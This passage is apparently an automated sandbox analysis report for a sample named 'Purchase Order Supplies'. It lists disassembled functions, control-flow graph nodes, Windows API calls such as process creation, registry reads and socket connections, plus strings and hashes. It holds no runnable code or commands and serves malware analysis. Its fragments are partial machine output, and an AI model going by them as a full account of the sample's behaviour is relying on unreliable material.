cf272c-cf274a call cb017e * 3 1542->1558 1559 cf2725-cf272a 1542->1559 1543->1547 1549 cf2819-cf2838 call ca2570 CloseHandle 1544->1549 1550 cf2813 1544->1550 1549->1547 1550->1549 1558->1508 1559->1558 1559->1559
                          APIs
                          • _memset.LIBCMT ref: 00CF23E6
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CF2579
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CF259D
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CF25DD
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CF25FF
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CF2760
                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00CF2792
                          • CloseHandle.KERNEL32(?), ref: 00CF27C1
                          • CloseHandle.KERNEL32(?), ref: 00CF2838
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                          • String ID:
                          • API String ID: 4090791747-0
                          • Opcode ID: 26ab356c6a9ca4c966d1006c42c33d44c598373d4131020bd082a08a8e2eb6de
                          • Instruction ID: f6351a82d56b83db91349f7a2b6b214b4a5070be8614a2b634cb48cc5f63ac28
                          • Opcode Fuzzy Hash: 26ab356c6a9ca4c966d1006c42c33d44c598373d4131020bd082a08a8e2eb6de
                          • Instruction Fuzzy Hash: 8AD1BD31604305DFCB14EF24C895A6ABBE1EF85310F18885EF9999B3A2DB30ED45DB52
                          Function 00CEC8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1572 cec8b7-cec8f1 1573 ceccfb-ceccff 1572->1573 1574 cec8f7-cec8fa 1572->1574 1575 cecd04-cecd05 1573->1575 1574->1573 1576 cec900-cec903 1574->1576 1577 cecd06 call cec235 1575->1577 1576->1573 1578 cec909-cec912 call cecff8 1576->1578 1582 cecd0b-cecd0f 1577->1582 1583 cec914-cec920 1578->1583 1584 cec925-cec92e call cdbe14 1578->1584 1583->1577 1587 cec934-cec93a 1584->1587 1588 cecc61-cecc6c call c9d2c0 1584->1588 1589 cec93c-cec93e 1587->1589 1590 cec940 1587->1590 1596 cecc6e-cecc72 1588->1596 1597 cecca9-ceccb4 call c9d2c0 1588->1597 1592 cec942-cec94a 1589->1592 1590->1592 1594 ceccec-ceccf4 1592->1594 1595 cec950-cec967 call ccabf3 1592->1595 1594->1573 1607 cec969-cec96e 1595->1607 1608 cec973-cec97f 1595->1608 1600 cecc78 1596->1600 1601 cecc74-cecc76 1596->1601 1597->1594 1606 ceccb6-ceccba 1597->1606 1604 cecc7a-cecc98 call cad6b4 call cd97b6 1600->1604 1601->1604 1623 cecc99-cecca7 call cdd7e4 1604->1623 1610 ceccbc-ceccbe 1606->1610 1611 ceccc0 1606->1611 1607->1575 1612 cec9ce-cec9f9 call cafa89 1608->1612 1613 cec981-cec98d 1608->1613 1617 ceccc2-ceccea call cad6b4 call cd503c call ca2570 1610->1617 1611->1617 1624 cec9fb-ceca16 call caac65 1612->1624 1625 ceca18-ceca1a 1612->1625 1613->1612 1614 cec98f-cec99c call cca8c8 1613->1614 1622 cec9a1-cec9a6 1614->1622 1617->1623 1622->1612 1628 cec9a8-cec9af 1622->1628 1623->1582 1631 ceca1d-ceca24 1624->1631 1625->1631 1635 cec9be-cec9c5 1628->1635 1636 cec9b1-cec9b8 1628->1636 1632 ceca26-ceca30 1631->1632 1633 ceca52-ceca59 1631->1633 1639 ceca32-ceca48 call cca25b 1632->1639 1642 cecadf-cecaec 1633->1642 1643 ceca5f-ceca66 1633->1643 1635->1612 1644 cec9c7 1635->1644 1636->1635 1641 cec9ba 1636->1641 1654 ceca4a-ceca50 1639->1654 1641->1635 1645 cecaee-cecaf8 1642->1645 1646 cecafb-cecb28 VariantInit call cb1970 1642->1646 1643->1642 1649 ceca68-ceca7b 1643->1649 1644->1612 1645->1646 1657 cecb2d-cecb30 1646->1657 1658 cecb2a-cecb2b 1646->1658 1652 ceca7c-ceca84 1649->1652 1655 ceca86-cecaa3 VariantClear 1652->1655 1656 cecad1-cecada 1652->1656 1654->1633 1659 cecabc-cecacc 1655->1659 1660 cecaa5-cecab9 SysAllocString 1655->1660 1656->1652 1661 cecadc 1656->1661 1662 cecb31-cecb43 1657->1662 1658->1662 1659->1656 1663 cecace 1659->1663 1660->1659 1661->1642 1664 cecb47-cecb4c 1662->1664 1663->1656 1665 cecb4e-cecb52 1664->1665 1666 cecb8a-cecb8c 1664->1666 1667 cecb54-cecb86 1665->1667 1668 cecba1-cecba5 1665->1668 1669 cecb8e-cecb95 1666->1669 1670 cecbb4-cecbd5 call cdd7e4 call cda6f6 1666->1670 1667->1666 1671 cecba6-cecbaf call cec235 1668->1671 1669->1668 1673 cecb97-cecb9f 1669->1673 1678 cecc41-cecc50 VariantClear 1670->1678 1682 cecbd7-cecbe0 1670->1682 1671->1678 1673->1671 1680 cecc5a-cecc5c 1678->1680 1681 cecc52-cecc55 call cd1693 1678->1681 1680->1582 1681->1680 1684 cecbe2-cecbef 1682->1684 1685 cecc38-cecc3f 1684->1685 1686 cecbf1-cecbf8 1684->1686 1685->1678 1685->1684 1687 cecbfa-cecc0a 1686->1687 1688 cecc26-cecc2a 1686->1688 1687->1685 1691 cecc0c-cecc14 1687->1691 1689 cecc2c-cecc2e 1688->1689 1690 cecc30 1688->1690 1692 cecc32-cecc33 call cda6f6 1689->1692 1690->1692 1691->1688 1693 cecc16-cecc1c 1691->1693 1692->1685 1693->1688 1695 cecc1e-cecc24 1693->1695 1695->1685 1695->1688
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID:
                          • String ID: NULL Pointer assignment$Not an Object type
                          • API String ID: 0-572801152
                          • Opcode ID: da46ddede9301a976e4e62c096f59f1140595cdf6e69168134c53bde26c9b364
                          • Instruction ID: 1dd31e151862772a48ab5c7b0d8b0ec668b078e21804bf0634cb320b8e92440c
                          • Opcode Fuzzy Hash: da46ddede9301a976e4e62c096f59f1140595cdf6e69168134c53bde26c9b364
                          • Instruction Fuzzy Hash: 2FE1D371A00259AFDF10CFA9C8C5BAE77B5FF48314F148069F955AB281D7709E42DBA0
                          Function 00CEBF80 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1696 cebf80-cebfe1 call cb1970 1699 cec21b-cec21d 1696->1699 1700 cebfe7-cebfeb 1696->1700 1701 cec21e-cec21f 1699->1701 1700->1699 1702 cebff1-cebff6 1700->1702 1703 cec224-cec226 1701->1703 1702->1699 1704 cebffc-cec00b call cdbe14 1702->1704 1705 cec227 1703->1705 1710 cec158-cec15c 1704->1710 1711 cec011-cec015 1704->1711 1707 cec229 call cec235 1705->1707 1714 cec22e-cec232 1707->1714 1712 cec15e-cec160 1710->1712 1713 cec16d 1710->1713 1715 cec01b 1711->1715 1716 cec017-cec019 1711->1716 1718 cec16f-cec171 1712->1718 1713->1718 1717 cec01d-cec01f 1715->1717 1716->1717 1719 cec033-cec03e 1717->1719 1720 cec021-cec025 1717->1720 1718->1701 1721 cec177-cec17b 1718->1721 1719->1705 1720->1719 1722 cec027-cec031 1720->1722 1723 cec17d-cec17f 1721->1723 1724 cec181 1721->1724 1722->1719 1725 cec043-cec05f 1722->1725 1726 cec183-cec186 1723->1726 1724->1726 1733 cec067-cec081 1725->1733 1734 cec061-cec065 1725->1734 1727 cec188-cec18e 1726->1727 1728 cec193-cec197 1726->1728 1727->1703 1729 cec19d 1728->1729 1730 cec199-cec19b 1728->1730 1732 cec19f-cec1c9 VariantInit VariantClear 1729->1732 1730->1732 1740 cec1cb-cec1cd 1732->1740 1741 cec1e6-cec1ea 1732->1741 1742 cec089 1733->1742 1743 cec083-cec087 1733->1743 1734->1733 1735 cec090-cec0e5 call cafa89 VariantInit call cb1a00 1734->1735 1758 cec108-cec10d 1735->1758 1759 cec0e7-cec0f1 1735->1759 1740->1741 1744 cec1cf-cec1e1 call ca2570 1740->1744 1745 cec1ec-cec1ee 1741->1745 1746 cec1f0-cec1fe call ca2570 1741->1746 1742->1735 1743->1735 1743->1742 1757 cec0fb-cec0fe 1744->1757 1745->1746 1749 cec201-cec219 call cda6f6 VariantClear 1745->1749 1746->1749 1749->1714 1757->1707 1762 cec10f-cec131 1758->1762 1763 cec162-cec16b 1758->1763 1760 cec103-cec106 1759->1760 1761 cec0f3-cec0fa 1759->1761 1760->1757 1761->1757 1766 cec13b-cec13d 1762->1766 1767 cec133-cec139 1762->1767 1763->1757 1768 cec141-cec157 call cda6f6 1766->1768 1767->1757 1768->1710
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$_memset
                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                          • API String ID: 2862541840-625585964
                          • Opcode ID: 514d3d05658ff1578890ed33249208764a1595b0f590e6713b8dd06aaf168dd0
                          • Instruction ID: a2fa0243191f95541819e309d0b361c0e4a47e6dd8c9211053413a9aed17197d
                          • Opcode Fuzzy Hash: 514d3d05658ff1578890ed33249208764a1595b0f590e6713b8dd06aaf168dd0
                          • Instruction Fuzzy Hash: F3919071A00255EFDF24CFA6CC84FAEB7B8AF45710F108519F925AB241D7709A46CFA0
                          Function 00CAEB05 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00CAEADA,?,?), ref: 00CAEB27
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,00CAEADA,?,?), ref: 00D04B26
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,00CAEADA,?,?), ref: 00D04B65
                          • RegCloseKey.ADVAPI32(?,?,00CAEADA,?,?), ref: 00D04B94
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: QueryValue$CloseOpen
                          • String ID: Include$Software\AutoIt v3\AutoIt
                          • API String ID: 1586453840-614718249
                          • Opcode ID: 33681542a321a4f53f1ff61f8263db37137a45750b263429e42c164a98cb41b9
                          • Instruction ID: f9bf1fe84b1c603af0ded8f56aedd837b4850f560ad81014a330a4489c3ed79a
                          • Opcode Fuzzy Hash: 33681542a321a4f53f1ff61f8263db37137a45750b263429e42c164a98cb41b9
                          • Instruction Fuzzy Hash: B8113D71601219BEEF049BA4DD86EFE77BDEB08354F104059B506E6190EA709E06E760
                          Function 00C92E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                          Download Yara Rule
                          APIs
                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C92ECB
                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C92EEC
                          • ShowWindow.USER32(00000000), ref: 00C92F00
                          • ShowWindow.USER32(00000000), ref: 00C92F09
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$CreateShow
                          • String ID: AutoIt v3$edit
                          • API String ID: 1584632944-3779509399
                          • Opcode ID: cdb669750f04516796f8a0c418e04f1dfbcf20c0ad0235841bbbee6f09f0b76f
                          • Instruction ID: ac2b1b831520560e76faaf11cf9c5bb5772103f701d55b7d39c275b486c2f218
                          • Opcode Fuzzy Hash: cdb669750f04516796f8a0c418e04f1dfbcf20c0ad0235841bbbee6f09f0b76f
                          • Instruction Fuzzy Hash: D1F0B775A403A47AE721576BAC48F673E7EE7D6F61B01411ABE08E22A0C6610895DAB0
                          Function 00CD6D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C93B1E: _wcsncpy.LIBCMT ref: 00C93B32
                          • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00CD6DBA
                          • GetLastError.KERNEL32 ref: 00CD6DC5
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CD6DD9
                          • _wcsrchr.LIBCMT ref: 00CD6DFB
                            • Part of subcall function 00CD6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00CD6E31
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                          • String ID:
                          • API String ID: 3633006590-0
                          • Opcode ID: b7acd46369d9379104611ff1ec3c670d1c05e5217d73eb0705b892b4e2c7474a
                          • Instruction ID: 4140c8275d375013c83752269d8400dcd36bcd50ad3e88ef69581cf032ff8960
                          • Opcode Fuzzy Hash: b7acd46369d9379104611ff1ec3c670d1c05e5217d73eb0705b892b4e2c7474a
                          • Instruction Fuzzy Hash: 1621D5756413149ADF2467B4EC4AAEA33ADCF11310F204557E631C32D2EF20DF85D655
                          Function 00CE9122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CEACD3: inet_addr.WS2_32(00000000), ref: 00CEACF5
                          • socket.WS2_32(00000002,00000001,00000006), ref: 00CE9160
                          • WSAGetLastError.WS2_32(00000000), ref: 00CE916F
                          • connect.WS2_32(00000000,?,00000010), ref: 00CE918B
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ErrorLastconnectinet_addrsocket
                          • String ID:
                          • API String ID: 3701255441-0
                          • Opcode ID: 4c3fd952095550736d55b86a9640126e3093dc9fe6ed4b4cf561f11f1f0adf00
                          • Instruction ID: efa0c355876c11d2fdf8c051d68944d3f1ba1a0f2d9c4e3a498f170cd9e3746b
                          • Opcode Fuzzy Hash: 4c3fd952095550736d55b86a9640126e3093dc9fe6ed4b4cf561f11f1f0adf00
                          • Instruction Fuzzy Hash: 0B218E31600211AFDB00AF69CC89BAE77A9EF49724F048459F956EB3D1DB74E8029B61
                          Function 00C93DCB Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C93F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00C934E2,?,00000001), ref: 00C93FCD
                          • _free.LIBCMT ref: 00D03C27
                          • _free.LIBCMT ref: 00D03C6E
                            • Part of subcall function 00C9BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00D522E8,?,00000000,?,00C93E2E,?,00000000,?,00D2DBF0,00000000,?), ref: 00C9BE8B
                            • Part of subcall function 00C9BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00C93E2E,?,00000000,?,00D2DBF0,00000000,?,00000002), ref: 00C9BEA7
                            • Part of subcall function 00C9BDF0: __wsplitpath.LIBCMT ref: 00C9BF19
                            • Part of subcall function 00C9BDF0: _wcscpy.LIBCMT ref: 00C9BF31
                            • Part of subcall function 00C9BDF0: _wcscat.LIBCMT ref: 00C9BF46
                            • Part of subcall function 00C9BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 00C9BF56
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                          • API String ID: 1510338132-1757145024
                          • Opcode ID: 0ceecd8b809a0d30f854039e5cd5185995d0df981eca89affd66a8596a589cba
                          • Instruction ID: 52800c5c78854a07f542088a2b0acf922309f0f89f4f9e8269697ce1e5d46690
                          • Opcode Fuzzy Hash: 0ceecd8b809a0d30f854039e5cd5185995d0df981eca89affd66a8596a589cba
                          • Instruction Fuzzy Hash: CE918271A10259AFCF04EFA4DC95AEE77B8BF05314F14442AF416AB291EB34DE05DB60
                          Function 00CB413E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                          Download Yara Rule
                          APIs
                          • __getstream.LIBCMT ref: 00CB418E
                            • Part of subcall function 00CB889E: __getptd_noexit.LIBCMT ref: 00CB889E
                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00CB41C9
                          • __wopenfile.LIBCMT ref: 00CB41D9
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                          • String ID: <G
                          • API String ID: 1820251861-2138716496
                          • Opcode ID: 92a7b568e790816f4de70560bdc83c0f83bd03fbf37824f4729858bc6d3dbb03
                          • Instruction ID: 2974765e7e850644cbde6c1391fc5993859e38a54414fc1abe63335eb7f81873
                          • Opcode Fuzzy Hash: 92a7b568e790816f4de70560bdc83c0f83bd03fbf37824f4729858bc6d3dbb03
                          • Instruction Fuzzy Hash: 4511C670D04216AFDB15BFB88C426EF37A4AF55350F148525A825DB282EB74CE81B761
                          Function 00CAC955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00CAC948,SwapMouseButtons,00000004,?), ref: 00CAC979
                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00CAC948,SwapMouseButtons,00000004,?,?,?,?,00CABF22), ref: 00CAC99A
                          • RegCloseKey.KERNEL32(00000000,?,?,00CAC948,SwapMouseButtons,00000004,?,?,?,?,00CABF22), ref: 00CAC9BC
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: Control Panel\Mouse
                          • API String ID: 3677997916-824357125
                          • Opcode ID: 02e2e3c109de2a41fe0e30b426fc6a5a8f0a8bc144e72e6ecd4634198e359b89
                          • Instruction ID: d9a8502832659202a7a05da4172e36c8119aa19cfa4571180e2e1ee6c3040768
                          • Opcode Fuzzy Hash: 02e2e3c109de2a41fe0e30b426fc6a5a8f0a8bc144e72e6ecd4634198e359b89
                          • Instruction Fuzzy Hash: BE117C75511209FFDB118F64DC84EEF77B8EF09749F00841AB841E7210D7319E419B60
                          Function 00CCA8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 718b9dc378c1e2ac9511271ab14699e1a17f596629c87b79c313a569a1956dac
                          • Instruction ID: 89deef089262ec06508641d75e4dafb6653324116b6a9fae6f4d1f6ef2097ff9
                          • Opcode Fuzzy Hash: 718b9dc378c1e2ac9511271ab14699e1a17f596629c87b79c313a569a1956dac
                          • Instruction Fuzzy Hash: 5DC13975A0021AEFCB14CFA4C998FAEB7B5FF48708F104599E911AB251D730DE81DBA1
                          Function 00CDCC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C941A7: _fseek.LIBCMT ref: 00C941BF
                            • Part of subcall function 00CDCE59: _wcscmp.LIBCMT ref: 00CDCF49
                            • Part of subcall function 00CDCE59: _wcscmp.LIBCMT ref: 00CDCF5C
                          • _free.LIBCMT ref: 00CDCDC9
                          • _free.LIBCMT ref: 00CDCDD0
                          • _free.LIBCMT ref: 00CDCE3B
                            • Part of subcall function 00CB28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00CB8715,00000000,00CB88A3,00CB4673,?), ref: 00CB28DE
                            • Part of subcall function 00CB28CA: GetLastError.KERNEL32(00000000,?,00CB8715,00000000,00CB88A3,00CB4673,?), ref: 00CB28F0
                          • _free.LIBCMT ref: 00CDCE43
                          Memory Dump Source
